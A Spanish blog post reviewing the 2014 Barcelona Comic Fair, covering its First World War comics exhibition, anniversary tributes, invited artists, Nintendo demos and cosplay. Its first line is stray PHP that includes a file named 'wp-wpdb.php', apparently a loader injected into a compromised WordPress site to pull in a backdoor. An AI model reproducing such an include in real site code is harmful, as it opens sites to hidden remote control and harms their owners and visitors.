if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Crónica del Salón del Cómic de Barcelona 2014 – La Fortaleza de LeChuck

Crónica del Salón del Cómic de Barcelona 2014

Otro año más nos dejamos caer por el Salón del Cómic de Barcelona en su 32 edición para disfrutar de sus exposiciones, invitados y stands con las últimas novedades del mundillo. Durante los 4 días, un total de 106.000 visitantes asistieron al evento, donde se notó especial afluencia el sábado a pesar de partido de liga, o el Expomanga, que coincidía ese fin de semana en Madrid.

salon-del-comic-2014

El 28 de Julio de 2014, se cumplirán cien años del comienzo de la Primera Guerra Mundial, y Ficomic preparó una gran exposición bélica titulada Cómics en Guerra, donde las viñetas bélicas, los impresionantes vehículos y stands con sus respectivos miembros de asociaciones y excombatientes tiñeron la feria de verde. Más de 550 ilustraciones colgaban de los diferentes lugares del pabellón 1, algunas elaboradas por prisioneros de campos de concentración. Además, se organizaron mesas redondas y talleres con gente que vivió los conflictos muy de cerca.

salon-del-comic-2014-2

Los clásicos del cómic no podían faltar en esta edición, y se rindió homenaje a Batman, Lobezno y Popeye por sus respectivos aniversarios, con exposiciones a todo detalle. Me hizo especialmente ilusión la de Popeye, tengo mucho cariño a ese personaje y su serie, y recuerdo como mis padres lo usaban de excusa para que comiéramos yo y mi hermano espinacas, pero a mí ni con esas.

También fue muy interesante la zona dedicada a los humoristas gráficos de diferentes publicaciones y su visión irónica de la actualidad. La exposición titulada Por el derecho a sonreír, recogió viñetas y tiras de autores de medios de comunicación con distinto perfil ideológico. Algunos de los dibujantes que se dieron cita a través de sus obras fueron: Albert Monteys (El Jueves), Alfonso López (publico.es) Caín (La Razón) José Manuel Puebla (ABC) Toni Batllori (La Vanguardia) Fer (El Punt Avui) y Pinto & Chinto (La Voz de Galicia), entre muchos otros.

salon-del-comic-2014-4

La 23 edición del Salón del Cómic trajo un gran elenco de ilustres invitados internacionales de la talla de Pia Guerra, Mike Carey, Manuele Fior, Paul Jenkins, R.M. Guéra, Audrey Spiry, Matt Peters, Bill Presing, Brian Azzarello y Eduardo Risso. Los asistentes tuvieron la ocasión de participar en diferentes actividades, y como no, la deseada firma y foto.

En cuanto a videojuegos, Nintendo nunca falla a su cita, y tuvo su espacio, aunque algo menor que en pasadas ediciones. No obstante, los asistentes de todas las edades pasaron por ahí para probar las grandes joyas y últimas novedades de 3DS y Wii U: Luigi’s Mansion 2, New Super Mario Bros. 2 y Mario Party: Island Tour, Pokémon X/ Y, The Legend of Zelda: A Link Between Worlds, Inazuma Eleven 3: La amenaza del Ogro y Animal Crossing: New Leaf. El inminente Mario Kart 8 de Wii U era el más deseado para probar, y frecuentemente habían colas, aunque por desgracia era la demo ya vista en el Salón del Manga pasado.

salon-del-comic-2014-5

Los cosplayers no se perdieron el evento, y pudimos ver trajes de diferentes cómics, mangas, series, películas y, por supuesto, videojuegos. Este fantástico video resume muy bien la calidad de los cosplayers que se dieron cita en el 32 Salón del Cómic. ¡Disfrutadlo!

He echado en falta el escenario, algún concurso de cosplay y más stands, aunque esto ha hecho que hubiera más espacio para pasear y disfrutar de las exposiciones, que sin duda ha sido lo mejor de esta edición. Ahora solo nos queda esperar hasta el próximo Salón del Manga, confirmado para el puente del 1 de noviembre en el mismo lugar.

Categorizado como Eventos